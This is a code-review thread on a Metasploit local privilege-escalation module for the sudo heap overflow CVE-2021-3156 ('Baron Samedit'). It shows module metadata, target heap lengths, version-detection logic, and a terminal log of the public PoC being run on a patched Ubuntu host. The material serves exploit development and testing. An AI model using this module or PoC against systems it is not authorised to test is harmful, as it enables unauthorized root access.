modules/exploits/linux/local/cve_2021_3156_sudo.rb

```diff
@@ -0,0 +1,158 @@
+            'Spencer McIntyre',                  # metasploit module
+            'bwatters-r7',                       # metasploit module
+            'blasty <blasty@fail0verflow.com>',  # original PoC
+            'Alexander Krog'                     # detailed vulnerability analysis and exploit technique
+          ],
+        'SessionTypes'   => ['shell', 'meterpreter'],
+        'Platform'       => ['unix', 'linux'],
+        'References'     => [
+          ['URL', 'https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit'],
+          ['URL', 'https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt'],
+          ['URL', 'https://www.kalmarunionen.dk/writeups/sudo/'],
+          ['URL', 'https://github.com/blasty/CVE-2021-3156/blob/main/hax.c'],
+          ['CVE', '2021-3156'],
+        ],
+        'Targets'        =>
+          [
+            [ 'Manual', { } ],
+            [ 'Ubuntu 20.04.1 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ] } ],
+          ],
+        'DefaultTarget'  => 1,
+        'Arch'           => ARCH_X64,
+        'DefaultOptions' => { 'WfsDelay' => 10 },
+        'DisclosureDate' => '2021-01-26',
+        'Notes' => {
+          'AKA'         => [ 'Baron Samedit' ],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/)
+      ]
+    )
+  end
+
+  def get_versions
+    versions = {}
+    output = cmd_exec("sudo --version")
+    if output
+      version = output.split("\n").first.split(' ').last
+      versions[:sudo] = version if version =~ /^\d/
+    end
+
+    # this libc version check will need to be updated to support non-linux targets like OSX
+    output = cmd_exec("ldd --version")
+    if output
+      version = output.split("\n").first.split(' ').last
+      versions[:libc] = version if version =~ /^\d/
+    end
+
+    versions
+  end
+
+  def check
+    sudo_version = get_versions[:sudo]
+    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil?
+
+    # fixup the p number used by sudo to be compatible with Gem::Version
+    sudo_version.gsub!(/p/, '.')
+
+    vuln_builds = [
+      [Gem::Version.new('1.8.2'), Gem::Version.new('1.8.31.2')],
+      [Gem::Version.new('1.9.0'), Gem::Version.new('1.9.5.1')],
+    ]
+
+    if vuln_builds.any? { |build_range| Gem::Version.new(sudo_version).between?(*build_range) }
+      return CheckCode::Appears("sudo #{sudo_version} is a vulnerable build.")
```

Comment:
This module targets Ubuntu (so far). Unfortunately, the bug was patched in sudo `1.8.31-1ubuntu1.2` which `sudo --version` reports as `1.8.31`.

Output on a patched system looks like this:

```
test@ubuntu:/tmp$ git clone https://github.com/blasty/CVE-2021-3156
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 11 (delta 2), reused 11 (delta 2), pack-reused 0
Unpacking objects: 100% (11/11), 2.74 KiB | 1.37 MiB/s, done.
test@ubuntu:/tmp$ id
uid=1001(test) gid=1001(test) groups=1001(test)
test@ubuntu:/tmp$ cd CVE-2021-3156/
test@ubuntu:/tmp/CVE-2021-3156$ make
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
test@ubuntu:/tmp/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
test@ubuntu:/tmp/CVE-2021-3156$ uname -a
Linux ubuntu 5.4.0-58-generic #64-Ubuntu SMP Wed Dec 9 08:16:25 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
test@ubuntu:/tmp/CVE-2021-3156$ cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS"
test@ubuntu:/tmp/CVE-2021-3156$ sudo -l
[sudo] password for test: 
Sorry, user test may not run sudo on ubuntu.
test@ubuntu:/tmp/CVE-2021-3156$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
test@ubuntu:/tmp/CVE-2021-3156$ ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9.1) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
test@ubuntu:/tmp/CVE-2021-3156$ apt info sudo
Package: sudo
Version: 1.8.31-1ubuntu1.2
Priority: important
Section: admin
Origin: Ubuntu
Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
Original-Maintainer: Bdale Garbee <bdale@gag.com>
Bugs: https://bugs.launchpad.net/ubuntu/+filebug
Installed-Size: 2,257 kB
Depends: libaudit1 (>= 1:2.2.1), libc6 (>= 2.27), libpam0g (>= 0.99.7.1), libselinux1 (>= 2.0.65), libpam-modules, lsb-base
Conflicts: sudo-ldap
Replaces: sudo-ldap
Homepage: http://www.sudo.ws/
Task: minimal
Download-Size: 514 kB
APT-Manual-Installed: yes
APT-Sources: http://us.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
Description: Provide limited super user privileges to specific users
 Sudo is a program designed to allow a sysadmin to give limited root
 privileges to users and log root activity.  The basic philosophy is to give
 as few privileges as possible but still allow people to get their work done.
 .
 This version is built with minimal shared library dependencies, use the
 sudo-ldap package instead if you need LDAP support for sudoers.

N: There is 1 additional record. Please use the '-a' switch to see it
test@ubuntu:/tmp/CVE-2021-3156$ 
```

Reply:
For now I'm handling v1.8.31 as a special case and returning the check code of detected. Next week, I'll look into options to validate it more thoroughly perhaps by triggering the vulnerability and checking for SIGABRT. Thanks for catching this.